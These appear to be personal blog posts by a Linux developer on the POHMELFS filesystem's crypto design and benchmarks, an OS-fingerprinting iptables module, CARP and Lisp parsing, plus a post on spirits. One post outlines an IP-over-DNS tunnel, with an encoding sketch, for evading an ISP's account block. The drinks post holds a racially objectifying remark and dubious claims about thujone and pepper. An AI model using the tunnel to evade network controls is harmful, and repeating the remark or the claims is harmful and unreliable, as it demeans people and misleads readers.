form, which concentrates its aroma. Cognac is not swallowed immediately, but
'stored' in the mouth for a while to get all the taste.
The French also created absinthe. This is a very strong drink (up to 90 degrees),
but its main feature is thujone. History tells us that thujone was the main reason
why absinthe was forbidden in Europe, and that it was quite a strong hallucinogen.
History also tells us that its concentration never exceeded 10%, so it is unlikely
that it had some kind of strong effect. Vincent Van Gogh liked it very much;
there is even a theory that he cut off his ear during absinthe intoxication, but likely
it was some special absinthe, since a thujone concentration of 10% or less does
not have any significant effect. Right now absinthe is allowed in most of the countries
where it was forbidden about 100 years ago.
Eastern Europe drinks various kinds of vodka, which have local names.
For example the so called Cha-Cha, which is quite a strong (up to 80 degrees) drink, but usually
very clean, so it can be drunk without dilution.
The New World (mostly Mexico) brings us a very interesting vodka-like drink
called tequila. It is frequently called Mexican vodka, although the US also produces its own labels.
There are also types which are made using French cognac barrels.
Usually it is drunk with salt, lime (sometimes lemon) and
mulatto female. Process is very interesting: you lick mulatto's hip, cover it with salt,
lick it, get tequila shot and eat a lime portion. Even without mulatto it is still very
tasty drink. Tequila is made out of special sorts of agave; the more agave it contains, the higher
the quality.
One of the best-known vodka-like drinks from the Caribbean is rum. It is also quite a strong
drink, but because of its oil-like elements, it is sweeter and very tasty.
Rum is likely one of the most widely used strong drinks for cocktails.
I know that Koreans also like their own kind of vodka very much, which has a smaller alcohol concentration,
namely 20 degrees. It is made out of rice.
It is a very popular drink to be mixed with beer. It blows your roof off
after just a couple of shots.
Ukrainians have a very interesting drink called 'Gorilka', which is effectively
vodka with pepper. It is very tasty, but never eat the Gorilka pepper, or you
risk getting peptic poisoning.
There are several vodka mixes.
The first and likely the best known is the 'Screwdriver', which is vodka mixed with juice. It
is not very tasty imho. One of the strongest roof-blowing drinks is the so called
'ruff', a mixture of vodka and beer. Do not try it if you do not know what it is.
I also know one vodka long drink: vodka with Martini mixed one to one. Although it looks
quite strong, it is a very tasty drink with an excellent sweet and slightly dry taste.
Using my small cellar I created (at least tried for the first time) another long drink,
which consists of vodka mixed with 'Malibu' rum. It is also possible to add juice
or cold tea to it.
Meanwhile, having a rest from various celebrations, I managed
to complete multithreaded crypto processing on the receiving side
in POHMELFS.
So far it was only tested in a debug environment (i.e. zillions
of logs and overall miserable performance), but it shows that
different threads pick up the work, in both the sending and receiving
directions.
There is a limitation though: the same crypto threads are used for both
the receive and transmit paths, so it is possible to saturate them
all, for example with receiving, so that sending will stall. If there are
insufficient crypto threads, waiting for RX crypto processing can take
too long, so the watchdog transmit scanner will fire and complete transactions
with errors. One can work around this by specifying a big enough number of
crypto threads or a long enough transaction scanning timeout; both are provided
via mount options.
I would like to test it in a more production-like environment and perform various
stress tests on it, but I'm far from my working place, so I can not do it right now.
Which means the release will be postponed until tomorrow (if testing does not show
regressions or bugs).
This will not be the last feature release though: for example POHMELFS does not support
extended attributes and ACLs, there is no header checksum (although there is a reserved
32-bit field), and there may be some features in different areas too,
but I am in no hurry to implement them, since I need something to put into future
POHMELFS changelogs. I think sending the same kernel patch with different words
about userspace server changes is not the way to go, so there should be some kernel
changes too :)
I will draw up some design notes on how I plan to implement the POHMELFS server, namely
how the distributed facilities will be done. So far I have quite a clear picture in mind,
but it needs to be worked out 'on paper' to find rough corners.
- Shit! There are no more M8 screw-nuts.
- What? Use M12, the boson should pass through.
- We all will be fucked this Monday!
Good night. Actually as a former physicist I can say
that at least two out of the four killing theories are really
stupid, but nevertheless it's interesting!
I implemented a pool of crypto processing threads (their number
is a mount option parameter), each of which has a pool of pages to
encrypt data into. A crypto thread is not released until the server
returns an acknowledgement that data was successfully written, so one
should tune the number of threads and the page pool (the number of pages
in each thread is the maximum number of pages per transaction;
this limit has its own mount option too) according to the desired behaviour.
Testing shows that write performance was reduced noticeably with this
approach: with 4 encryption threads and 4 receiving threads in the server,
performance dropped by around 30%, from 65+ MB/s down to 46+ MB/s,
but I think it can be improved with a larger number of encryption threads.
During the iozone write/rewrite test each of the 4 crypto threads ate about 20-30%
of CPU, while the server ate about 130% (4 threads in total). In all previous iozone tests,
the larger the number of userspace threads used, the worse the results were
(this is somewhat expected, since iozone is a single-threaded benchmark,
so a larger number of threads leads only to performance degradation),
so I will test different setups (namely a larger number of crypto threads
and a smaller number of server threads).
But this behaviour is not a problem, and I expect it to be tuned; the real
problem is read performance. Right now there is only a single thread
which reads from one socket: it was done intentionally, since reading
data from a socket is a longer operation than searching for a page in the radix tree
or any other operation performed by that thread, so there is no way
to saturate its capabilities. That is, until we start encryption, which is slow,
so any subsequent data reading from the socket can not be done in parallel
with crypto processing, and overall read performance drops to the ground.
This problem has to be fixed, so I plan to use the same crypto
processing threads to decrypt and/or perform the hash check for received data
and push it up to the VFS stack.
First,
POHMELFS
does need to have encryption, because I plan to use
a distributed hash table approach in the server (well, consider the POHMELFS
kernel client as a kind of bittorrent filesystem client), and as in any
non-centralized system, content transferred via uncontrolled data channels
has to be encrypted.
But... I'm incredibly stupid: I implemented encryption and decryption in place,
i.e. a VFS page is encrypted prior to being written to the servers, so
a subsequent read leads to... Yes, it reads encrypted content.
To fix this issue I plan to encrypt data into different pages and send them,
leaving the VFS ones as is. There are two approaches I consider:
1. Allocate and send pages at writeback time - we want to send 5 pages, so allocate
5 pages, encrypt data into them and broadcast them to all needed servers.
2. Allocate a (potentially large) pool of pages at mount time per crypto thread
and encrypt data into them. This will have about zero run-time overhead for VFS,
except that write completion is slightly delayed because of encryption.
I frequently hear that whatever server you implement, it has to
be non-blocking, since in case of parallel sending it allows
sending multiple requests to fast servers while not sending data to
a slow server, since the non-blocking socket will return EAGAIN.
This solution is only half-right: when we have to put given data on
all servers, and can not free it until all servers have replied with an acknowledgement,
non-blocking mode can bring more damage than gain.
Mainly because it
allows eating all the memory for requests which are still in the queue
to be sent to the slow server, and which were already sent to the fast ones.
In this case a higher-level application (consider a simple application which generates
some data and writes it into a file in a distributed filesystem, which writes
the file to several servers) will never block, since the transfer
to the fast servers completes quickly, and will provide more and more data,
which will consume all RAM.
It is possible to deadlock the system in this case,
since to send some data to a remote server we always have to allocate at least some
memory to put network headers into. With the non-blocking solution we will consume
all memory and kick ourselves into a coma.
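One simple way to keep the writer from running away is to make it block once too much unacknowledged data is queued. The Python sketch below shows only that idea; the class and its byte-based limit are my assumptions for the example, not how any real filesystem does its accounting.

```python
import threading


class InFlightWindow:
    """Hypothetical limit on bytes queued but not yet acked by ALL servers."""

    def __init__(self, max_bytes):
        self.max_bytes = max_bytes
        self.used = 0
        self.cond = threading.Condition()

    def reserve(self, nbytes, timeout=None):
        """Block the writer until the request fits; False on timeout."""
        with self.cond:
            fits = self.cond.wait_for(
                lambda: self.used + nbytes <= self.max_bytes, timeout)
            if fits:
                self.used += nbytes
            return fits

    def release(self, nbytes):
        """Call when the slowest server has acknowledged the data."""
        with self.cond:
            self.used -= nbytes
            self.cond.notify_all()
```

The writer calls reserve() before queueing data and release() only after the last server replied, so the slow server sets the pace and memory usage stays bounded. A request larger than max_bytes would wait forever without a timeout, so a real implementation has to split or reject such requests.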
I've updated the OSF
modules to xtables, so you have to enable its support in the kernel config and get
a recent iptables (I tested with 1.4.1.1, which is the latest release to date).
OSF allows you to match incoming SYN packets against different sets of signatures and determine
which operating system is on the remote end, so you can make decisions based on OS type
and even version to some degree.
Installation instructions, an example and source code can be found on the
homepage.
I've also sent it to the netfilter-devel@ and netdev@ mailing lists, since my previous mails never appeared
there, likely because of spam filters.
Rumor number one. SWsoft
aka Parallels actively searches for Linux kernel hackers in
leading Moscow universities, namely MSU and MIPT. I saw their
posters, where among other (wanted) requirements there is
distributed filesystem knowledge.
Rumor number two. Alexey Kuznetsov (if you do not know,
he is the guy who wrote the major part of the Linux network stack,
namely the TCP/UDP/IP and socket implementations, and although
there were lots of changes in the stack since then, I think it will not
be an exaggeration to call him the author), who also worked
on Virtuozzo and OpenVZ (and its interesting VFS parts, which
AFAICS are not in the kernel, maybe yet), works on some
filesystem too. The last time we 'confronted' each other was a couple
of years ago, when I first implemented
netchannels
and tried to convince the network community (namely Alexey Kuznetsov
and David Miller)
that the netchannel idea is worth further investigation and implementation.
IIRC I did not succeed, although the results were very
impressive.
Let's see what will happen with filesystems :)
Rumor number three. SWsoft recently started to actively search
for a kernel hacker for a 'new interesting open source project'. They
always searched for kernel programmers, but never told anything
about the projects; now something has changed.
Rumor number four. OpenVZ and Virtuozzo have serious problems with NFS
(especially when the server dies), probably because of the very ugly NFS protocol
(yes it is), so it's hard to properly virtualize it (or not?). There are
no alternatives to NFS right now in major production environments, but you all know about
POHMELFS
which right now can be used as a really good replacement.
Rumor number five. SWsoft has a long history of PhD defences (at least in MIPT) based on
a theoretical FS called TorFS (namely Tormasov FileSystem); a year ago it was still
not a very alive project in practice,
but I heard that it was very impressive in theory. This rumor has existed
for really many years.
So, I have quite a clear picture that SWsoft started development of a new
distributed filesystem, which is aimed at first at replacing NFS in virtualized
environments. I can also imagine very interesting distributed parallel facilities
needed for virtualized systems. And they try to attract lots of people to the
project as well as really heavy artillery like Alexey Kuznetsov.
Which basically means that sooner or later my development will meet strong
competition from this company, which has lots of really good professionals.
And that's very interesting and cool :)
P.S. or it may be complete bullshit and a delirium of my fevered consciousness.
And one fact about
POHMELFS:
today I finished client support for padded crypto processing of all requests
and started to work out the server bits. I expect to finish it in a day or so,
so a new release is very close.
It was really interesting. Although it is a very simple student
model, a friend produced very good sounds. He has not practiced
for many years, but nevertheless it was not that bad.
My everyday half-hour to hour exercises usually produce a worse sound, although
sometimes I do find really cool notes. Unfortunately I still do not
know some magic bit about how to catch that sound, it is born and
disappears on its own, but I'm sure I will find it, and I think I'm close
to where it hides :)
1. Because of an encryption problem - data to be encrypted has to be
blocksize aligned - some information about padding has to
be added into the network command as well as the crypto data size.
2. IV generation. I decided to extend the network command and put there
a 64-bit IV for the given packet. Using a simple sequence number is enough
to protect against message replay attacks.
3. Encryption/hashing of data. I decided not to encrypt/hash network headers,
and only do it for transmitted data. If a transaction contains several
commands, data for all commands will be encrypted/hashed; in case of hash,
a single digest/hmac will be generated and placed into the transaction header.
4. It is possible that I will add a strong header checksum, which will be generated
only for the header and placed into a special field. It will be calculated
assuming the checksum field is zero. This step is optional so far, but the network header
has 32 reserved bits, which can be used for it.
Right now hashing and encryption work, but are not checked on the server (although generated);
because of the crypto alignment ugliness I decided to rethink the approach a bit.
Evolution process in action...
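To illustrate points 1, 2 and 4 above, here is a small Python sketch of padding data to the cipher block size and of a header checksum computed with the checksum field set to zero. Everything concrete in it is an assumption made for the example: the header layout, the field names, the 16-byte block size, and CRC32, which only stands in for whatever (stronger) checksum would really be used.

```python
import struct
import zlib

BLOCK = 16  # assumed cipher block size in bytes (AES)

# Hypothetical header layout, NOT the real POHMELFS one:
# 64-bit IV (sequence number), 32-bit data size, 16-bit padding,
# 16-bit command, 32-bit header checksum.
HDR = struct.Struct("<QIHHI")


def pad(data, block=BLOCK):
    """Zero-pad data to a block multiple; return (padded, padding size)."""
    padding = -len(data) % block
    return data + b"\0" * padding, padding


def build_header(iv, size, padding, cmd):
    """Pack the header; checksum is computed with its own field zeroed."""
    zeroed = HDR.pack(iv, size, padding, cmd, 0)
    return HDR.pack(iv, size, padding, cmd, zlib.crc32(zeroed))


def check_header(raw):
    """Recompute the checksum over the header with a zeroed checksum field."""
    iv, size, padding, cmd, csum = HDR.unpack(raw)
    return zlib.crc32(HDR.pack(iv, size, padding, cmd, 0)) == csum
```

The receiver needs the padding size from the header to cut the decrypted data back to its original length, which is why it has to travel in the network command.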
That really sucked - yes, we played badly. Just like it was before.
It is not really surprising.
But what was that fucking abnormal thing a week ago against Holland? That
was new, was cool, was bloody great, but not today. Tired or whatever...
What's the difference right now, we lost.
Yes, Spain played really well, my congratulations.
But our team showed that it is possible.
That there is nothing impossible.
We can, when we want. You can, when you want.
The POHMELFS server is able to handshake hash/cipher names and operation
modes, to initialize the appropriate algorithms and perform basic operations
(like a more generic hash_update() instead of different
functions with different arguments used to hash data depending on the operation mode,
either simple digest or hmac: EVP_DigestUpdate()/HMAC_Update()).
I'm working on the right way of doing crypto processing, i.e. without serious changes in the code,
since how it is done right now is a bit hairy.
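The generic hash_update() idea can be shown in a few lines of Python, where the standard hashlib and hmac objects already share the same update()/digest() interface. This is only an illustration of the wrapper idea; the server itself is written against OpenSSL, and the function names below are made up for the example.

```python
import hashlib
import hmac


def make_hasher(name, key=None):
    """Return a plain digest object, or an HMAC object when a key is given."""
    if key is None:
        return hashlib.new(name)
    return hmac.new(key, digestmod=name)


def hash_update(hasher, chunks):
    """Feed chunks one by one; callers do not care which mode is in use."""
    for chunk in chunks:
        hasher.update(chunk)
    return hasher.digest()
```

The caller picks the mode once at setup time and then feeds headers and data chunks through the same function, for example hash_update(make_hasher("sha1", key), [header, page]).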
I already hate the OpenSSL API: EVP_get_cipherbyname(), EVP_MD_CTX, EVP_DigestFinal_ex().
It looks like the above functions were written by three different people who
never actually talked to each other about how to make them look similar... But it is
a minor issue of course.
So, when things settle down, I will make a new release; likely it will see the light this week.
My ISP has again blocked my account and can not unblock it although there
is money on the deposit. There are serious problems in its billing
system which require manual intervention by the operator. Unfortunately
it is a real challenge to call them; it already took more than half an hour
yesterday, without success.
So, I decided to implement an interesting idea on how to bypass the blocking.
It is based on a security 'hole' in its (and I think the vast majority
of ISPs do the same) DNS configuration, which allows
requesting any DNS record even if the account is blocked. It will be fetched from
a remote DNS server if there are no records in the ISP's cache.
Thus the attack vector becomes visible: implement an IP over DNS tunnel network device
and set up local routing to use it by default. One has to control at least one
remote machine which hosts DNS records for the given domain name, since it is required
to parse incoming DNS requests and process them accordingly.
There are at least two known IP over DNS tunnel solutions:
NSTX
(howto) and
OzymanDNS
(howto). Both solutions require that you own some
server to run the ip-over-dns tunnel server on.
Unfortunately I have only a single machine with a static IP address which is not protected
by lots of firewalls and allows incoming connections.
The simplest solution for this problem is to create an iptables input target rule
for the server, which will parse incoming DNS requests, pass usual queries up
the network stack to the userspace server, and handle 'poisoned' queries as the tunnel.
The client can be TUN/TAP based, but can also be a tunnel network device.
I believe the more weird it looks, the more interesting it is, so I will likely think
more about kernel based tunnels.
DNS queries are limited enough not to allow binary data (IIRC,
the most interesting are DNS TXT records), but it can be appropriately
encoded and enciphered. So, I will put it into the
todo list.
I even think that it is not that bad an idea to have such modules in the kernel :)
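As a rough sketch of the 'appropriately encoded' part: binary data can be base32-encoded (DNS names are case-insensitive, so base64 is a poor fit) and split into labels of at most 63 characters, with the whole name limited to 253 characters. The Python below is just my illustration of that encoding; it is not how NSTX or OzymanDNS do it, and the domain is a placeholder.

```python
import base64

MAX_LABEL = 63   # DNS limit for a single label
MAX_NAME = 253   # DNS limit for the whole name in text form


def encode_query(payload, domain):
    """Turn non-empty binary payload into a query name under domain."""
    text = base64.b32encode(payload).decode("ascii").rstrip("=").lower()
    labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
    name = ".".join(labels + [domain])
    if len(name) > MAX_NAME:
        raise ValueError("payload too large for a single DNS name")
    return name


def decode_query(name, domain):
    """Server side: strip the domain and recover the payload."""
    suffix = "." + domain
    if not name.endswith(suffix):
        raise ValueError("not a tunnel query")
    text = name[:-len(suffix)].replace(".", "").upper()
    text += "=" * (-len(text) % 8)   # restore base32 padding
    return base64.b32decode(text)
```

With a short domain this leaves room for a bit more than a hundred bytes of payload per query, so an IP packet has to be fragmented over several queries, and the replies have to carry data back in a similar way.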
But testing can not be done without appropriate server support, which
is now the main task. POHMELFS uses a lazy crypto engine: each network state
(it represents a connection between the client and one server) contains
a number of fields used exclusively for semi-lockless input data processing
(it locks the state when it performs actual reading, but does not
hold that lock when processing incoming messages, since it is the only
path which receives data); now it also has crypto information about
how to manage reply messages (they include the read page reply for example),
so it does not queue work to be done by crypto threads, but does that itself
instead. It may or may not be the bottleneck of the input path; tests will
provide facts. So far I do not have plans to change it, but it can be done
of course if performance sucks.
After I finish crypto processing in both the client (it has been written, but requires lots
of testing with the server) and the server (I have just started to recall how to work with
OpenSSL. Well, I've read how HMAC works in OpenSSL, found it to be simple enough
and then started to read how to parse binary data in LISP :)
But anything which is interesting for me now ends up in good results for all other
projects), I will switch to something different for a while.
Some voices in the brain ask to be spread in lots of interesting directions :)
I've run read/reread and write/rewrite tests as described
in the previous run,
now with HMAC(SHA1) of all outgoing transactions (note that read response data is not yet
encrypted and does not contain a digital signature; the server also does not support either operation),
so essentially only writing should be affected by this, but I also ran the read tests for completeness.
Results show zero performance overhead from full data SHA1 hashing, but note that quite fast
machines were used (two 3 GHz Xeons (2 physical and 2 logical CPUs, HT enabled) with 1 GB of RAM). All the time only
two crypto threads were actively hashing data, since there are only two pdflush threads on this machine.
Writing is even faster with hashing, but results drifted around, so essentially performance is the same.
I've just learnt that it is impossible to map the same page
twice: for example the first time using kmap()/kunmap()
and the second one via kmap_atomic()/kunmap_atomic().
Although the mechanisms are a bit different in both mappings, it is
forbidden to do, and the system will panic like this:
This happened in exactly the above case, when a page was first mapped via
kmap() in POHMELFS and then via
kmap_atomic() in the HMAC crypto processing code.
I wonder what will happen if we ever try to send kmapped pages
over an IPsec tunnel. Likely it will oops too...
This can happen for example when pages are mapped in
tcp_sendpage() when calling sendfile()
over an interface which does not support hardware checksumming
and scatter-gather: mapped pages are pushed down the network stack
where they will eventually be encrypted/hashed in IPsec, which
will in turn call kmap_atomic().
So, if you find an obscure oops in kmap_atomic()
and friends, first check that the calling stack did not map the page
earlier.
So far it only includes encryption and hash calculation for outgoing
transactions. The system has a (mount option) number of threads per superblock,
which are responsible for encryption/hashing (each thread has its own crypto structure,
so there are no additional allocations in the fast path, although I think
they would not harm performance since they should be a small enough
fraction on top of the crypto processing overhead) and subsequent data sending,
so the original caller (like writeback/readahead code) will not block if there
are ready threads; otherwise it will wait until some thread finishes its current crypto work.
I decided to implement a kind of continuation for such transactions, where the network sending
code (which is supposed to be started after crypto processing) will be invoked from those threads
which performed the crypto operations, without returning back to the original caller's context.
For massively multiqueue NICs that should be a benefit, but so far I have not tested its performance.
The next step is receiving crypto support and userspace changes.
If I did not miss something,
GNU TLS (I never worked with it)
supports a very limited number of ciphers and hashes, so it is not appropriate for
a filesystem data protection layer.
According to its
documentation
GNU TLS only supports AES, RC4 and 3DES ciphers and SHA1 and MD5 hashes. There is also only the CBC
chaining mode and several hash/cipher schemes.
So, the POHMELFS server will use OpenSSL for data protection. Sooner or later OpenSSL
will get hardware crypto support on Linux too (well, the Linux crypto stack should first
implement a userspace API, which does not exist yet, although there is
work
by Loc Ho from AMCC to add such support).
So far I decided to implement the following protection scheme: checksum or encryption
will cover the full transaction data, but will be applied in chunks:
1. Transaction 'first-level' data, i.e. the header and data placed immediately after the transaction
header. For all commands except page writing this will be the end of it.
2. For the write pages command, each header is generated dynamically and does not exist
until data is really being sent, so the crypto code will run over all pages and update the checksum,
processing headers and data pages separately. The checksum update should be simple enough, since
there are crypto helpers to update and finalize a checksum, but encryption is more complex:
it requires all chunks to be set up in advance in a single scatterlist chain, and with dynamic header
generation this is too big an overhead (it requires not only scatterlist allocation, but also
header allocation just for encryption), so encryption will be done separately for headers and pages,
and I will have to create some IV propagation scheme (like the last bytes of the previous unencrypted chunk
becoming the IV for the next chunk, or something like that). I understand that it may not be a very
secure approach though.
Reading data back from the server is simpler, since there are no transactions,
and data will be encrypted/checksummed like in the first step above. It is possible that this will
force me to increase the network header structure a bit (32 or 16 bits to store the size of the attached checksum).
It is fucking unbelievable, but Russia is playing Holland
and the score is 1:1. Not only is it equal, we do play cool football!
And Holland equalized in the 87th minute; we were so close, but
it is not over yet. We can win. We will win!
I do not understand how the hell our team started to play that
well, but we can. We fucking can, when we want. We play not for the goal, not
for the money, not for fucking anything, we play just for the game.
And the game wins!
The first half of extra time has ended. Russia vs Holland 1:1.
We can. Just because we can.
As I found with
distributed storage
project, any communication channels, which involve huge amount of data transfers,
have to have additional strong checksum embedded in the protocol, since TCP one is not
enough in some cases. There are some options, like TCP MD5 signatures or IPsec transformations,
but those are not always available.
POHMELFS
will include ability to both encrypt whole data channel and/or only digitally
sign all messages. This will be implemented on transaction level, so no higher layer code
(like reading/writing data functions) will ever be affected.
POHMELFS will also have mount time self-configuration, i.e. client will send to server
information about supported capabilities, requested by administrator, and if server does not
support some of them (for example it can only do HMAC and not encryption, and both operations were
requested at mount time), they will be dropped (and mount failed optionally).
In the future it will be possible to extend it with additional flags if needed.
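The mount-time negotiation can be pictured as a bitmask intersection. A minimal sketch follows; the flag names, the `strict` switch and the error text are made up for the example and are not the real POHMELFS protocol.

```python
from enum import Flag

class Cap(Flag):
    # Hypothetical capability bits, not the real protocol values.
    HMAC = 1
    ENCRYPT = 2

def negotiate(requested, server_supported, strict=False):
    """Return the capabilities both sides agree on.

    Unsupported capabilities are dropped, or the mount fails when
    strict is set (the "mount failed optionally" case).
    """
    agreed = requested & server_supported
    dropped = requested & ~server_supported
    if strict and dropped:
        raise RuntimeError(f"mount failed: server lacks {dropped}")
    return agreed

# Server can only do HMAC, administrator asked for both operations.
agreed = negotiate(Cap.HMAC | Cap.ENCRYPT, Cap.HMAC)
```

New flags can be added later by extending the enumeration, which matches the note about additional flags in the future.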
mount is not a very convenient command for transferring crypto information (like binary keys)
to the kernel, so I use the same infrastructure as the initial server group initialization (i.e. the
existing POHMELFS configuration utility).
Support for HMAC and encryption will force the server to depend on OpenSSL,
but I do not think it is a problem. Some time in the future I can write autoconfiguration, which will
allow compiling the server without crypto support (which thus does not accept encrypted clients and
does not check signatures) if there is no OpenSSL.
After crypto operations are implemented (I expect it to be finished this week), I will release as promised
a new netchannel
version (and will remove unneeded functionality like NAT), and add some interesting bits (like async
processing) into distributed storage,
so expect its new release soon too.
Excellent documentation with examples.
I expect that it is implementation (i.e. CLISP) specific and will not work with SBCL or Allegro
for example, but nevertheless I want to learn and somewhat use it.
If it will be good for my usage cases, what my next userspace server will be written with? :)
Hardware used in testing: 4-way Intel E7520 system (two logical and two physical CPUs)
3Ghz 32 bit Xeons with 1gb of ram, Adaptec AIC7902 Ultra320 SCSI adapter with SEAGATE
ST3300007LC 10k rpm 300 Gb testing disk. Its linear reading speed is about 90 MB/s.
Software used in testing: 2.6.25 kernels (on server and client), in-kernel async NFS server,
userspace POHMELFS server.
Tests were performed with 8gb files (amount of ram was reduced to 1gb to eliminate caching
influence) with different (from 8 to 1024 KB) record size. I ran write/rewrite, read/reread and
random read and write tests.
Zach Brown has
committed
cache coherency support into CRFS repository.
Cache coherency protocol works by broadcasting special messages from
server, and each client invalidates appropriate inodes (and dentries if needed)
before sending back a reply. POHMELFS
uses a bit different mechanism: client does not send acks back to server,
so all such messages are kind of advisory-only, but I did not yet complete (well,
I did not even think about this problem this week) locking design, so it can change.
Main problem with sync cache coherency support is its absolute non-scalability.
While a number of usage cases might require such behaviour, I expect that if not the major,
then a noticeable part of users do not want performance degradation as the price for
posix-like coherency expectations. This approach is worse than a write-through cache,
since there is a whole round-trip of the cache coherency request instead of just
data sending during writing. Single direction sending is faster than sending+waiting,
so for me it is still a questionable approach.
I will think a lot about this problem later this week(end), so that the solution would
satisfy both the high-performance and safety camps (although only to some degree, I think).
(defmacro with-output-dir ((out pos dir flags) &body form)
  ;; Deliberately anaphoric: the body can refer to OPERATION.
  `(let ((,pos 2))
     (dolist (operation (nthcdr 2 *iozone-tests*))
       (let* ((out-dir (pathname-as-directory ,dir))
              (output-file (make-pathname
                            :directory (pathname-directory out-dir)
                            :name operation
                            :type "gnuplot")))
         (with-open-file (,out output-file :direction :output :if-exists ,flags)
           ,@form))
       (incf ,pos))))
(defun write-gnuplot-headers (dir)
  (with-output-dir (out pos dir :supersede)
    (format out "set title \"Iozone performance: ~a, KB/s\"~%" operation)
    (format out "set terminal png small size 450 350~%")
    (format out "set logscale x~%")
    (format out "set xlabel \"Record size in KBytes\"~%")
    (format out "set ylabel \"Kbytes/sec\"~%")
    (format out "set output \"~a.png\"~%" (elt *iozone-tests* pos))
    (format out "plot ")))
(defun update-gnuplot-headers (dir file)
  (with-output-dir (out pos dir :append)
    (unless *first-file-p*
      (format out ", "))
    (let* ((fstype (pathname-name file))
           (name (make-output-name file)))
      (format out "\"~a\" using 1:~d title \"~a\" with lines" name (1+ pos) fstype))))
Macros are really the coolest feature of LISP. Now I believe I started to understand LISP kung-fu.
Iozone parser is essentially ready. I was a bit pessimistic yesterday: it took only half of the day and several
hours today, and the code itself is rather ugly (and frequently really ugly, likely far from the LISP way), but it works:
it runs over the given dir, searches there for files with given extensions, parses them (removes unneeded iozone information),
and writes the result to the specified directory. It also runs over iozone test strings and generates gnuplot scripts for them, which
will build a graph based on filesystem info it gathered traversing the tree above, so results look like this:
$ ./parser.lisp
Processing: /tmp/iozone/tmpfs/nfs.out ... done
Processing: /tmp/iozone/tmpfs/pohmelfs.out ... done
$ cat /tmp/iozone/tmpfs/out/read.gnuplot
set title "Iozone performance: read, KB/s"
set terminal png small size 450 350
set logscale x
set xlabel "Record size in KBytes"
set ylabel "Kbytes/sec"
set output "read.png"
plot "/tmp/iozone/tmpfs/nfs.out.data" using 1:5 title "nfs" with lines,
"/tmp/iozone/tmpfs/pohmelfs.out.data" using 1:5 title "pohmelfs" with lines
(defun string_to_list (str)
  (let ((num 0) (ret '()) (string_len (length str)))
    (dotimes (i string_len)
      (let ((sym (elt str i)))
        (cond
          ((not (char-number-p sym))
           (unless (eql num 0)
             ;(format t ": ~d~%" num)
             (push num ret)
             (setf num 0)))
          (t (setf num (+ (* num 10) (to_number sym)))
             (when (eql i (- string_len 1))
               (push num ret))))))
    (nreverse ret)))
This is a part of my LISP parser for iozone output files. So far it is able to convert its output numbers (performance in KB/sec)
into LISP lists (one list per record), so a single line of iozone output becomes a single list of numbers
(ugh, I was forced to write a string-to-number conversion function).
It is likely not that serious an achievement, and it took the whole day, but nevertheless I like it,
although I would write the same in C much faster :)
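For comparison, the same "one line of output becomes one list of numbers" step is sketched below in Python. It is not a translation of the parser: the sample line is made up, and unlike the function above this version keeps zero values in the middle of a line.

```python
import re

def line_to_numbers(line):
    """Return every run of decimal digits in the line as an integer."""
    return [int(token) for token in re.findall(r"\d+", line)]

# Hypothetical record: file size, record size, then throughput columns in KB/s.
sample = "  8388608      8   54321   60000   0"
numbers = line_to_numbers(sample)
```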
Main problem with Lisp for me is its functional-conditioning system. Converted to C it looks like:
if (a) {
    if (b) {
        if (c) {
            do_stuff();
        }
    }
}
While I would write:
if (!a)
    return;
if (!b)
    return;
if (!c)
    return;
do_stuff();
So far I did not use macros at all, and all the time looked into
Practical Common Lisp book
(and frankly got the directory processing functions from there, although
I modified them a bit), but what would you expect from the first project. Tomorrow I will extend it to
write a gnuplot-compatible file and finally generate some graphs (I do not know
how to call external programs from LISP though).
Frankly, I'm not yet excited about how cool LISP is, but I like it, since it is different.
Just like I like my neverending apartment development process.
Ugh, and with proper automatic vim highlighting I am not afraid of parentheses.
Interested reader can grab my sources
and comment on ugliness.
Decided to work on a completely different area than usual
today, so: neverending apartment development.
Today I painted the whole ceiling in the kitchen and I want to believe
that it is the last time. It was not that quick, but took a noticeably smaller
part of the day.
The main task was the floor in the hall. I finally covered it with ceramic granite.
It was supposed to be a seamless granite installation, but... the tiles have such precise
dimensions that the difference between them was never more than half a centimeter
on each side, so I was forced to make small seams and move tiles around for quite
a while before they formed somewhat straight lines, although there are
lots of non-straight crosses.
Nevertheless it looks cool, I'm glad I finished this part.
Ever dreamt of blocking all Linux users in your network from accessing
the internet and giving full bandwidth to Windows worms? We have to care about
our smaller brothers, so this iptables extension module allows you to do
so.
OSF stands for OS Fingerprint; it allows you to build the usual iptables
decisions on incoming TCP packets, and only the initial handshake packet with the SYN
bit is enough to understand what the remote OS is. Original idea belongs to
Michal Zalewski.
This iptables module was
implemented almost 5 years ago and lived in the patch-o-matic iptables tree (the userspace
library is still there). Now I've updated it to Xtables
and sent it for review.
Installation steps are described on the
homepage,
but are trivial and include the usual make/make lib building and loading rules into the module
via a procfs file.
Fixed bug found by Salvatore Del Popolo (delpopolo_dit.unitn.it)
in TCP implementation, when system checked sending window and determined,
that packet was not allowed to be sent and nevertheless tried to do so in some
cases.
Userspace network stack
is a very fast (when working on top of
netchannels;
packet sockets are supported too) and very small network stack (TCP/UDP/IP/Ethernet) implemented
entirely in userspace. Because it lives at the very end of the peer (i.e. very close
to or even embedded into the application), it allows much faster processing of some workloads, namely
small packet sending and receiving, where
it outperforms
the vanilla Linux TCP/IP stack by 3 times in performance and 4 times in CPU usage (sending and receiving vary).
Compare netchannels+unetstack versus Linux sockets (2006 numbers).
It is not about problems in the Linux stack, but about the overhead of syscalls, which in turn
results from data sending and reply processing being too separate in the existing model.
I've finally made a new release of the
CARP
for Linux kernel.
CARP is an improved version of the Virtual Router Redundancy Protocol (VRRP) standard.
The latest protocol to help provide high availability and network redundancy, it was
developed because router giant Cisco Systems believes that its Hot Standby Router
Protocol (HSRP) patent covers some of the same technical areas as VRRP.
This project allows you to build highly available clusters of multiple machines with
balanced master selection between them. Installation and setup are pretty trivial:
$ tar -zxf carp_latest.tar.gz
$ cd carp
$ make
# insmod ip_carp.ko
# modprobe cn
# insmod carp_conn.ko
# ifconfig carp0 up
# carp_conn_daemon -m master.sh -b backup.sh
And the same on all other machines.
Each script, as you can guess from its name, is executed when the node becomes master or backup;
you can put there firewall rule changes, traffic shaping setup, network daemon start/stop
scripts and whatever you like.
Its main advantage over any other existing open (well, it behaves much more robustly than Cisco VRRP though)
master/backup solutions (like Heartbeat or userspace CARP) is the ability to set up a multicast address (via the usual
/sbin/ifconfig command) and thus not confuse some crappy Cisco
hardware, which will not understand that the node changed.
One can get the latest sources from CARP homepage.
Enjoy!
POHMELFS write speed about 10% faster, read speed 3-3.5 times faster
(essentially disk/local fs IO limit, see below).
